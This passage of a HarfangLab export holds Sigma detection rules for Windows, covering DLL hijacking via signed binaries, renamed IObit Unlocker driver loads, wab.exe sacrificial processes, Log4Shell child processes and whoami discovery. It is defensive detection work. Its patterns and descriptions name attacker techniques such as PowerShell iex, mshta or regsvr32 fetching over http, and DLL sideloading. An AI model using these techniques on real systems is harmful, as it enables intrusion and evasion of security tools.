"098502c3-27e1-4c6f-a53e-8fa8f3dd549f", + "rule_name": "DLL Hijacking via pcalua.exe", + "rule_description": "Detects potential Windows DLL Hijacking via pcalua.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "09c303fe-d535-4d15-9f45-17f91b3e39fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627557Z", + "creation_date": "2026-03-23T11:45:34.627559Z", + "enabled": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627563Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.reliaquest.com/blog/double-extortion-attack-analysis/", + "https://www.iobit.com/fr/iobit-unlocker.php", + "https://attack.mitre.org/techniques/T1562/001/" + ], + "name": "t1562_001_execution_of_renamed_iobitunlocker_driver.yml", + "content": "title: Renamed IObit Unlocker Driver Loaded\nid: 09c303fe-d535-4d15-9f45-17f91b3e39fc\ndescription: |\n Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\n This driver driver has been abused by adversaries to disable security tools and evade detection.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Tool.IoBitUnlocker\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n OriginalFileName: 'IObitUnlocker.sys'\n\n # This is handled by the rule 79f2b027-0261-441e-a1d1-d569515a7c9b\n filter_image:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "09c303fe-d535-4d15-9f45-17f91b3e39fc", + "rule_name": "Renamed IObit Unlocker Driver Loaded", + "rule_description": "Detects the 
loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\nThis driver driver has been abused by adversaries to disable security tools and evade detection.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n", + "rule_creation_date": "2023-09-19", + "rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "09e88047-86aa-4e82-a0bb-4d8613732d6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.616726Z", + "creation_date": "2026-03-23T11:45:34.616729Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.616737Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": 
"t1055_sacrificial_process_wab.yml", + "content": "title: Wab.exe Sacrificial Process Spawned\nid: 09e88047-86aa-4e82-a0bb-4d8613732d6a\ndescription: |\n Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n It is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/22\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Program Files\\Windows Mail\\wab.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "09e88047-86aa-4e82-a0bb-4d8613732d6a", + "rule_name": "Wab.exe Sacrificial Process Spawned", + "rule_description": "Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. 
This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nIt is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\n", + "rule_creation_date": "2024-03-22", + "rule_modified_date": "2025-02-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.073376Z", + "creation_date": "2026-03-23T11:45:34.073377Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.073382Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": 
[ + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/", + "https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://attack.mitre.org/versions/v10/techniques/T1190/" + ], + "name": "t1190_log4j_vulnerability_exploitation.yml", + "content": "title: Suspicious Process Spawned by Java Application\nid: 09f74bd7-74d5-4ebb-bdda-430f8cf9a81f\ndescription: |\n Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\n This critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\n It is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\nreferences:\n - https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/\n - https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\n - https://attack.mitre.org/versions/v10/techniques/T1190/\ndate: 2021/12/20\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Java\n - classification.Windows.Exploit.Log4Shell\n - classification.Windows.Exploit.CVE-2021-44228\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n - ParentImage|endswith: '\\cmd.exe'\n GrandparentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n\n selection_powershell:\n 
Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'iex'\n - 'invoke-expression'\n - 'Start-Process'\n - 'New-Object -ComObject'\n - '*^*^*^*'\n\n selection_msiexec:\n Image|endswith: '\\msiexec.exe'\n CommandLine|contains: 'http'\n\n selection_mshta:\n Image|endswith: '\\mshta.exe'\n CommandLine|contains: 'http'\n\n selection_regsvr32:\n Image|endswith: '\\regsvr32.exe'\n CommandLine|contains: 'http'\n\n selection_rundll32:\n Image|endswith: '\\rundll32.exe'\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n selection_hh:\n Image|endswith: '\\hh.exe'\n CommandLine|contains: 'http'\n\n selection_schtasks:\n Image|endswith: '\\schtasks.exe'\n CommandLine|contains: '/create'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'powershell.exe -Command & {Start-Process -FilePath `\"?:\\KineQuantum\\steamvrredist\\bin\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files (x86)\\'\n - '/tr ?:\\Apple\\Local\\Library\\WebObjects\\Applications\\'\n - '/tr ??:\\Program Files\\'\n - '/tr ??:\\Program Files (x86)\\'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some Java applications may spawn a legitimate process.\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f", + "rule_name": "Suspicious Process Spawned by Java Application", + "rule_description": "Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\nThis critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\nIt is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java 
application is running a vulnerable version of Log4j.\n", + "rule_creation_date": "2021-12-20", + "rule_modified_date": "2025-05-27", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.initial_access" + ], + "rule_technique_tags": [ + "attack.t1190" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622840Z", + "creation_date": "2026-03-23T11:45:34.622842Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.622846Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1033/" + ], + "name": "t1033_whoami_windows.yml", + "content": "title: Current Username Discovered via Whoami (Windows)\nid: 0a3934f6-2b4c-4fb0-81ea-2601e7665b3a\ndescription: |\n Detects the execution of whoami.exe.\n This command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\n It is recommended to analyze the parent process and context as well as to correlate this alert with 
other discovery commands executed around it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_commandline:\n CommandLine:\n - 'whoami'\n - 'whoami ?all'\n - 'whoami ?priv'\n - 'whoami ?groups'\n - 'whoami.exe'\n - 'whoami.exe ?all'\n - 'whoami.exe ?priv'\n - 'whoami.exe ?groups'\n ParentImage|contains: '?'\n\n # This is handled by the rule 77575317-f87a-49a1-b295-f2a7a23f75d4\n filter_system:\n IntegrityLevel: 'System'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_grandparentimage:\n GrandparentImage|endswith:\n # IBM i Access Client Solutions\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: 
'?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n exclusion_msys2:\n Image: '?:\\msys64\\usr\\bin\\whoami.exe'\n ParentImage:\n - '?:\\msys64\\usr\\bin\\bash.exe'\n - '?:\\msys64\\usr\\bin\\sh.exe'\n\n exclusion_ms_monitoring_agent:\n # grandparent: C:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs 0 {B87E55DB-EA55-993D-FA42-5A4B215D0593} {59E3FB68-8F43-D96C-1EF9-EE090EDDD8E6} false xxx_domain_name_xxx yyyyy 11001 21001\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs '\n CurrentDirectory|startswith: '?:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State'\n\n exclusion_palo_alto:\n # C:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & C:\\windows\\System32\\whoami.exe /groups\n # but for whatever reason, we don't have the grandparentinfo (PanGpHip.exe)\n CommandLine: '?:\\windows\\System32\\whoami.exe /groups' # 1 space before /groups\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & ?:\\windows\\System32\\whoami.exe /groups' # 2 spaces before /groups\n\n exclusion_podman:\n GrandparentImage|endswith: '\\Podman Desktop.exe'\n ParentCommandLine: 'powershell.exe $null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object {$_.SID -eq \"S-1-5-32-544\"})'\n\n exclusion_cygwin:\n Image|endswith: '\\cygwin64\\bin\\whoami.exe'\n ParentImage|endswith: '\\cygwin64\\bin\\bash.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\postgresql-*.*-*-windows-x64.exe|'\n - '|?:\\VTOM\\ABM\\BIN\\bdaemon.exe|'\n - '|?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe|'\n\n exclusion_schedule:\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", + "block_on_agent": false, + 
"quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a", + "rule_name": "Current Username Discovered via Whoami (Windows)", + "rule_description": "Detects the execution of whoami.exe.\nThis command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n", + "rule_creation_date": "2021-03-15", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1033", + "attack.t1069" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098031Z", + "creation_date": "2026-03-23T11:45:34.098033Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098037Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://twitter.com/an0n_r0/status/1544472352657915904", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_iexpress.yml", + "content": "title: DLL Hijacking via IEXPRESS.exe\nid: 0a4830e7-82c9-4ac1-b846-a68dc4caa7ab\ndescription: |\n Detects potential Windows DLL Hijacking via IEXPRESS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IEXPRESS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft 
Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab", + "rule_name": "DLL Hijacking via IEXPRESS.exe", + "rule_description": "Detects potential Windows DLL Hijacking via IEXPRESS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.588153Z", + "creation_date": "2026-03-23T11:45:34.588157Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.588165Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_label.yml", + "content": "title: DLL Hijacking via label.exe\nid: 0a4bf049-476a-4f76-b1ff-c92e630ba3ea\ndescription: |\n Detects potential Windows DLL Hijacking via label.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'label.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - 
'\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea", + "rule_name": "DLL Hijacking via label.exe", + "rule_description": "Detects potential Windows DLL Hijacking via label.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0a708087-9ef8-4db8-b5a9-84d30391d776", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591044Z", + "creation_date": "2026-03-23T11:45:34.591047Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591055Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_mdsched.yml", + "content": "title: DLL Hijacking via mdsched.exe\nid: 0a708087-9ef8-4db8-b5a9-84d30391d776\ndescription: |\n Detects potential Windows DLL Hijacking via mdsched.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - 
